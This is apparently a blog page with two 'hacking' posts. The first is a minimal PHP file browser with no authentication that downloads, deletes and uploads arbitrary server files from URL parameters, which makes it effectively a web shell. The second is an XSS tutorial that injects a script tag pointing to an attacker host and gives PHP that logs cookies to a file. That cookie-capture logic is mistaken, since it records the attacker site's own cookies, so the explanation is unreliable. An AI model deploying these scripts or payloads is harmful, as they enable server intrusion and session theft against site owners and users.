Posts tagged hacking

A 20 rows filebrowser-ftp client script in PHP

Here’s an example of a minimal filebrowser script, similar to a remote ftp client. You can clearly browse files, download them, delete and upload new ones.

<?php
if(isset($_GET['p']) && $_GET['p'])
    if(is_file($_GET['p'])){
        header('Content-Disposition: attachment; filename="'.basename($_GET['p']).'"');
        die(file_get_contents($_GET['p']));
    }else
        chdir(realpath($_GET['p']));
$base_path=getcwd().DIRECTORY_SEPARATOR;
if(isset($_FILES['f']['tmp_name']) && $_FILES['f']['tmp_name'])
    move_uploaded_file($_FILES['f']['tmp_name'], $base_path.$_FILES['f']['name']);
if(isset($_GET['d']) && is_file($base_path.$_GET['d']))
    unlink($base_path.$_GET['d']);
$files=scandir($base_path);
$html_list='';
foreach($files as $file){
    $p=urlencode($base_path.$file);
    $html_list.="<li><a href=\"?p=".$p."\">$file</a> ".((is_file($base_path.$file))?"| <a href=\"?p=$p&d=$file\">delete</a>":"")."</li>";
}
$form_upload='<form action="" method="POST" enctype="multipart/form-data"><input type="file" name="f" /><input type="submit" />';
echo "<h1>".getcwd()."</h1>$form_upload<ul>$html_list</ul>";

And here a screenshot:

Pay attention, this script is not production ready. It is only an experiment to demostrate the minimun work to create a complete file browser script. Put it on a public website could be dangerous.

Javascript Hack – easy XSS example

You can find tons of cross site scripting hacks. I would alert you with a common and easy to do type.

The first step is to insert a javascript include tag in a shared webservice user page :

<script language="javascript" src="http://yoursite.com/cookiejar.php"></script>

Second, you need to put a script at http://yoursite.com/cookiejar.php, with the following code:

<?php
if(!is_array($_COOKIE)) die();
foreach($_COOKIE as $cookie_name => $cookie_value)
    file_put_contents('cookiejar.txt',
                         $cookie_name.':'.$cookie_value."\n",
                         FILE_APPEND);

If the website allows you to put a raw html or tags, after a while you will see all the user cookies will visit the page with the tag you inserted.

So, you should never trust a user generated content. The better way to avoid XSS is to use an advanced web framework, like Django, Rails or Symfony. But if you are creating your own code project remember always to parse the user input, strip the tags or convert all the text in urlencoding.